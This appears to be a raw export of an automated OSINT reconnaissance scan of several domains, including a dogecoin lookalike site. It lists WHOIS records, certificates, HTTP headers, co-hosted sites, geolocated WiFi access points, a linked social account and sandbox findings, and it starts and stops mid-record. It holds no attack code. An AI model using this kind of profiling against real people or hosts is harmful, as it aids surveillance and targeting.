[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004cf]- [targetUID: 00000000-00007688]\n "f_0004d1" has type "Web Open Font Format (Version 2) CFF length 1590040 version 1.262"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d1]- [targetUID: 00000000-00007688]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\edge_driver.js]- [targetUID: 00000000-00004144]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00007688]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: 
[%TEMP%\\4144_1474562033\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004144]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\auto_open_controller.js]- [targetUID: 00000000-00004144]\n "f_0004d0" has type "PNG image data 1300 x 750 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004d0]- [targetUID: 00000000-00007688]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004144]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4144_1474562033\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004144]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4144_1474562033\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00004144]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004144]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004144]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4144_1312124947\\product_page.js]- [targetUID: 00000000-00004144]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset 
Store\\assets.db\\000003.log]- [targetUID: 00000000-00004144]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4144_1762870862\\Filtering Rules-AA]- [targetUID: 00000000-00004144]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00 | 185.199.108.153 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery | funny.battleb0t.xyz |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.108.153 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5eb92eaeff3814-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 104.196.30.220 |
| 2023-05-12 03:18:47 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://pics.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | matrix (Net ID: 00:02:2D:03:92:64) | 37.780462,-122.390564 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1620 Guest (Net ID: 00:01:21:30:37:80) | 52.3759, 4.8975 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Spain | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 02:44:18 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.110.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:82:16) | 37.780462,-122.390564 |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | rathook.cc | 185.199.109.153 |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0c:e3:f4:1c:e8:cb:bb:cf:13:f7:6c:6f:36:5e:c2:eb
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Feb 11 05:22:10 2023 GMT
Not After : May 12 05:22:09 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ce:18:28:ee:1e:4b:a0:54:f5:b2:a8:46:72:fa:
7a:1b:b5:83:d9:b7:b9:85:b6:7e:b8:27:ed:42:bb:
f5:8d:d9:0c:96:a1:ac:39:e8:ba:ac:6a:f9:9f:0d:
46:7d:1d:65:d4:56:4a:89:c7:ac:f3:42:0e:7d:79:
7a:b0:01:1a:1e:df:5a:64:96:92:41:7b:76:b3:71:
65:05:d4:d3:ac:cb:dd:ed:f6:10:2e:3d:94:bc:fe:
b8:5d:9b:af:1f:73:66:41:55:24:91:8f:6a:93:09:
c4:a9:4e:cc:3f:db:83:53:92:be:e5:79:63:d7:c0:
f2:ad:fb:15:4c:da:cf:26:0f:ae:09:13:32:5e:2f:
61:79:df:43:b7:2e:3e:7a:3f:f1:71:51:6a:d0:2c:
51:14:2b:e5:5a:3a:2a:63:a7:80:69:d6:dd:ff:21:
c9:3a:6c:59:b1:94:d7:a0:d6:e0:c5:59:62:0d:45:
33:fc:cc:08:f3:b9:08:a9:ea:24:98:5f:22:3c:5b:
51:7a:ef:2a:db:8c:ca:b6:bd:39:1c:ec:e9:76:19:
54:df:f7:38:11:32:20:7f:02:4a:bb:97:a7:34:fd:
a8:8b:36:ea:36:af:62:53:9d:78:4a:b7:98:3a:a9:
07:8f:74:9e:43:31:08:ab:be:62:c0:5e:01:ec:ce:
53:dd
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
F7:A7:5E:24:2E:1C:7A:7A:2A:90:36:DF:66:18:6B:A7:17:36:7E:3E
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_NaLKSGSIEY
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/fXbrD094iyQ.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:bc:ea:b6:cf:53:d5:18:fa:35:01:f5:1a:84:b4:db:1b:35:
a8:21:d4:b0:1c:8c:61:d9:0a:ed:8a:98:0e:ec:59:d1:7e:8a:
57:4f:81:85:21:9d:81:17:a5:6d:50:b7:02:17:30:3f:51:39:
0f:0d:a8:d9:9c:3b:6f:9f:16:6b:f6:f6:71:30:1e:f6:cd:df:
76:28:c1:38:b4:2a:e8:d2:ce:d8:22:7a:dc:2b:32:d6:cb:47:
88:b5:09:84:fa:12:6c:6e:e0:35:16:bb:24:8c:97:ba:91:7e:
45:50:9e:95:dc:7b:ff:96:e1:f9:37:11:30:5c:89:2e:ed:a5:
42:7f:26:b7:5c:84:0f:5f:e0:da:f9:32:fa:e2:bd:aa:52:51:
70:cd:f0:79:e0:2d:8e:67:56:3c:ba:c2:1e:d9:2f:a6:4b:13:
8c:cf:70:85:8b:05:86:ea:ed:7a:8a:75:c4:87:c4:fc:b8:11:
72:8c:37:b1:f0:08:21:35:fa:6a:0a:a7:28:58:06:2e:4b:74:
11:70:1e:20:5f:d2:60:2c:f6:42:ca:fa:2c:6e:50:27:2a:ea:
bd:8f:2d:c2:66:e4:e3:0c:69:4a:0b:47:18:a2:29:2b:ca:35:
4e:52:e9:78:dd:08:a8:e2:6b:51:5d:78:d4:f2:8b:19:66:55:
d1:aa:21:f5
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-EC32 (Net ID: 00:1D:D1:32:EC:30) | 32.8608, -79.9746 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8000::153 | battleb0t.xyz |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 212.30.196.104.bc.googleusercontent.com | 104.196.30.212 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | vsco (Category: social)
https://vsco.co/ayhu/gallery | ayhu |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 3 | 0 | 2 | 0 | None | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} | nuke.battleb0t.xyz |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000-bigtree.github.io | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:54:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://dogeco-in.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ac0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2752"\n "IsoScope_ac0_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ac0_ConnHashTable<2752>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_ac0_IE_EarlyTabStart_0xacc_Mutex"\n "IsoScope_ac0_IESQMMUTEX_0_303"\n "IsoScope_ac0_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\MSIMGSIZECacheMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"156.251.30.43:80"\n "156.251.30.43:443"\n "185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dogeco-in.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dogeco-in.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* 3.2 RD Twitterfeed" (Indicator: "twitter")\n ".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")\n ".mdi-twitter-box:before {" (Indicator: "twitter")\n ".mdi-twitter-circle:before {" (Indicator: "twitter")\n ".mdi-twitter-retweet:before {" (Indicator: "twitter")\n ".mdi-twitter:before {" (Indicator: "twitter")\n ".mdi-youtube-play:before {" (Indicator: "youtube")\n "a.icon-circle.fa-twitter:hover," (Indicator: "twitter")\n "a.icon-outlined.fa-twitter:hover," (Indicator: "twitter")\n "a.icon-rect.fa-twitter:hover," (Indicator: "twitter")\n "a.icon-rounded.fa-twitter:hover {" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar44CC.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab44CB.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "doge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpdogeco-in.com" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "_249931D0-CB5D-11ED-A05C-0800271774CB_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001476]\n "apk_1_.png" has type "PNG image data 195 x 67 8-bit/color RGBA non-interlaced"- 
[targetUID: N/A]\n "_173E45AF-CB5D-11ED-A05C-0800271774CB_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "favicon-32x32_1_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFB28382624D17019F.TMP" has type "data"- Location: [%TEMP%\\~DFB28382624D17019F.TMP]- [targetUID: 00000000-00002752]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1SJSDB5U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1SJSDB5U.txt]- [targetUID: 00000000-00002752]\n "script_1_.js" has type "ASCII text"- [targetUID: N/A]\n "Tar44CC.tmp" has type "data"- Location: [%TEMP%\\Tar44CC.tmp]- [targetUID: 00000000-00001476]\n "23TACHAW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\23TACHAW.txt]- [targetUID: 00000000-00002752]\n "JWH6TX8Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JWH6TX8Q.txt]- [targetUID: 00000000-00002752]\n "ND45872X.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ND45872X.txt]- [targetUID: 00000000-00002752]\n "doge_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002752]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: 
"www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/K88pR3goAWT7BTt32Z01mxJtnKITppOI_IvcXXDNrsc.woff2"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "C.JgU/0$"\n Pattern match: "dh.dogecofn.com/images/icon-appstore-180x60.png"\n Pattern match: "https://dogecoin.com/favicon-32x32.png"\n Pattern match: "https://dogecoin.com/assets/images/doge.svg"\n Pattern match: "https://dogecoin.com/assets/images/doge.webp"\n Pattern match: "MUID39EA38FB0AC96F4105FF2A240B856E28msn.com/102567574156831101417128039511631022954*"\n Heuristic match: "dogeco-in.com"\n Heuristic match: "GET / HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: dogeco-in.com"\n Pattern match: "https://dogeco-in.com/Accept-Language"\n Pattern match: "http://dogeco-in.com"\n Pattern match: "http://dogeco-in.com/"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025156916108831059172128039511631022954*"\n Pattern match: "MUIDB01CFF38783FC653F08A2E15882786465ieonline.microsoft.com/921666574156831101417127742636631022954*"\n Pattern match: "http://www.iec.chIEC"\n Heuristic match: "scrollTop: $(# + $(this).attr(\'data-custom-scroll-to\')).offset().top"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzBWV49_lSm1NYrwo-zkhivY.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzD0LW-43aMEzIO6XUTLjad8.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzJX5f-9o1vgP2EXwfjgl7AY.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzK-j2U0lmluP9RWlSytm3ho.woff2"\n Pattern match: 
